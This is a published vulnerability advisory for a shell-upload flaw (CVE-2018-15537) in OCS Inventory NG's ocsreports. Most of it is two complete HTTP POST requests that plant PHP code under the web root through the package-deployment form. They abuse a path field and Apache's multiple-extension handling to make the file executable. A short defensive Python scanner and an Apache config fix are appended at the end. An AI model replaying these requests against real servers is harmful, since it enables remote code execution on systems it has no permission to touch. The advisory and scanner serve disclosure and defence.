OCS Inventory NG ocsreports Shell Upload Vulnerability

14 Nov 2018 | Reported by Simon Uvarov | Type: zdt | Source: 0day.today | 295 views

Request for creating a temporary file with PHP code in OCS Inventory NG ocsreports directory

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2018-15537 | 14 Nov 2018 15:59 | circl |
| CVE | CVE-2018-15537 | 29 Nov 2018 21:00 | cve |
| Cvelist | CVE-2018-15537 | 29 Nov 2018 21:00 | cvelist |
| Debian CVE | CVE-2018-15537 | 29 Nov 2018 21:00 | debiancve |
| EUVD | EUVD-2018-7413 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2018-15537 | 29 Nov 2018 21:29 | nvd |
| OpenVAS | OCS Inventory NG <= 2.5.0 Remote Shell Upload Vulnerability | 23 Nov 2018 00:00 | openvas |
| OSV | DEBIAN-CVE-2018-15537 | 29 Nov 2018 21:29 | osv |
| OSV | UBUNTU-CVE-2018-15537 | 29 Nov 2018 21:29 | osv |
| Packet Storm | OCS Inventory NG ocsreports Shell Upload | 14 Nov 2018 00:00 | packetstorm |

## Request 1

This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.

    POST /ocsreports/index.php?function=tele_package HTTP/1.1
    Host: 192.168.5.135
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
    Content-Type: multipart/form-data; boundary=---------------------------491299511942
    Content-Length: 2836
    Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------491299511942
    Content-Disposition: form-data; name="CSRF_10"

    8ab3df2f9a2078530027e74191af0b087429ad41
    -----------------------------491299511942
    Content-Disposition: form-data; name="document_root"

    /usr/share/ocsinventory-reports/ocsreports/
    -----------------------------491299511942
    Content-Disposition: form-data; name="timestamp"

    a.php.a
    -----------------------------491299511942
    Content-Disposition: form-data; name="NAME"

    dshasdgasga
    -----------------------------491299511942
    Content-Disposition: form-data; name="DESCRIPTION"

    asdgasdga
    -----------------------------491299511942
    Content-Disposition: form-data; name="OS"

    WINDOWS
    -----------------------------491299511942
    Content-Disposition: form-data; name="PROTOCOLE"

    HTTP
    -----------------------------491299511942
    Content-Disposition: form-data; name="PRIORITY"

    5
    -----------------------------491299511942
    Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
    Content-Type: application/x-zip-compressed

    <?php

    phpinfo();

    ?>
    -----------------------------491299511942
    Content-Disposition: form-data; name="ACTION"

    EXECUTE
    -----------------------------491299511942
    Content-Disposition: form-data; name="ACTION_INPUT"

    asdgasdgasdg
    -----------------------------491299511942
    Content-Disposition: form-data; name="REDISTRIB_USE"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

    d:\tele_ocs
    -----------------------------491299511942
    Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

    5
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_USER"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_TEXT"

    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"

    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NEED_DONE_ACTION"

    0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"

    -----------------------------491299511942
    Content-Disposition: form-data; name="valid"

    Send
    -----------------------------491299511942
    Content-Disposition: form-data; name="digest_algo"

    MD5
    -----------------------------491299511942
    Content-Disposition: form-data; name="digest_encod"

    Hexa
    -----------------------------491299511942
    Content-Disposition: form-data; name="download_rep_creat"

    /var/www/html/download/server/
    -----------------------------491299511942--

## Request 2

This request renames the file to a.php.a-1 and also creates an info file.

    POST /ocsreports/index.php?function=tele_package HTTP/1.1
    Host: 192.168.5.135
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
    Content-Type: multipart/form-data; boundary=---------------------------4827543632391
    Content-Length: 3345
    Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------4827543632391
    Content-Disposition: form-data; name="CSRF_13"

    53b6eab749060aa8cbe972e9c9a31ae148cf886b
    -----------------------------4827543632391
    Content-Disposition: form-data; name="tailleFrag"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="nbfrags"

    1
    -----------------------------4827543632391
    Content-Disposition: form-data; name="comment"

    asdgasdga
    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest"

    b14f8d3b56fb10f2257f53ab32947a50
    -----------------------------4827543632391
    Content-Disposition: form-data; name="VALID_END"

    END
    -----------------------------4827543632391
    Content-Disposition: form-data; name="SIZE"

    347
    -----------------------------4827543632391
    Content-Disposition: form-data; name="document_root"

    /usr/share/ocsinventory-reports/ocsreports/
    -----------------------------4827543632391
    Content-Disposition: form-data; name="timestamp"

    a.php.a
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NAME"

    dshasdgasga
    -----------------------------4827543632391
    Content-Disposition: form-data; name="DESCRIPTION"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="OS"

    WINDOWS
    -----------------------------4827543632391
    Content-Disposition: form-data; name="PROTOCOLE"

    HTTP
    -----------------------------4827543632391
    Content-Disposition: form-data; name="PRIORITY"

    5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="teledeploy_file"; filename=""
    Content-Type: application/octet-stream

    -----------------------------4827543632391
    Content-Disposition: form-data; name="ACTION"

    EXECUTE
    -----------------------------4827543632391
    Content-Disposition: form-data; name="ACTION_INPUT"

    asdgasdgasdg
    -----------------------------4827543632391
    Content-Disposition: form-data; name="REDISTRIB_USE"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

    d:\tele_ocs
    -----------------------------4827543632391
    Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

    5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_USER"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_TEXT"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NEED_DONE_ACTION"

    0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"

    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest_algo"

    MD5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest_encod"

    Hexa
    -----------------------------4827543632391
    Content-Disposition: form-data; name="download_rep_creat"

    /var/www/html/download/server/
    -----------------------------4827543632391--

## Apache Config

The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:

    AddType application/x-httpd-php .php

Because mod_mime checks every dot-separated extension of a file name, any file whose name contains .php as one of its extensions, not only as the last one, might be executed as PHP. The uploaded file is therefore accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1

Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext

Regards,
Simon Uvarov


#  0day.today [2018-11-19]  #
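
For defenders auditing a host that carries the `AddType application/x-httpd-php .php` line, the following added example (not part of the original advisory or of OCS Inventory NG) emulates mod_mime's multiple-extension lookup and lists files under a document root that would run as PHP even though their names do not end in `.php`. The `TYPE_MAP` table and the function names are assumptions made for illustration; the `FilesMatch` form shown in the comment is the usual way to restrict PHP handling to the final extension.

```python
import os
import re

PHP = "application/x-httpd-php"
# Constructed stand-in for the server's extension-to-type map (mime.types plus
# the AddType line from ocsinventory-reports.conf); extend it to match the host.
TYPE_MAP = {"php": PHP, "txt": "text/plain", "jpg": "image/jpeg",
            "zip": "application/zip"}


def mod_mime_type(filename, type_map=TYPE_MAP):
    """Content type chosen by mod_mime's multiple-extension lookup.

    Every dot-separated part after the base name is looked up
    case-insensitively; unknown parts (such as "a-1") are skipped and the
    rightmost known one wins.
    """
    ctype = None
    for ext in os.path.basename(filename).split(".")[1:]:
        ctype = type_map.get(ext.lower(), ctype)
    return ctype


# The hardened form anchors on the final extension only:
#   <FilesMatch "\.php$">
#       SetHandler application/x-httpd-php
#   </FilesMatch>
FINAL_PHP = re.compile(r"\.php$")


def hidden_php_files(docroot, type_map=TYPE_MAP):
    """Paths under docroot that the AddType line would run as PHP although
    their names do not end in .php (candidates for planted scripts)."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if mod_mime_type(name, type_map) == PHP and not FINAL_PHP.search(name):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for path in hidden_php_files(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path)
```

Run it against the ocsreports directory; any path it prints is served as PHP under the current configuration and would stop being executed once the `FilesMatch` form replaces the `AddType` line.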
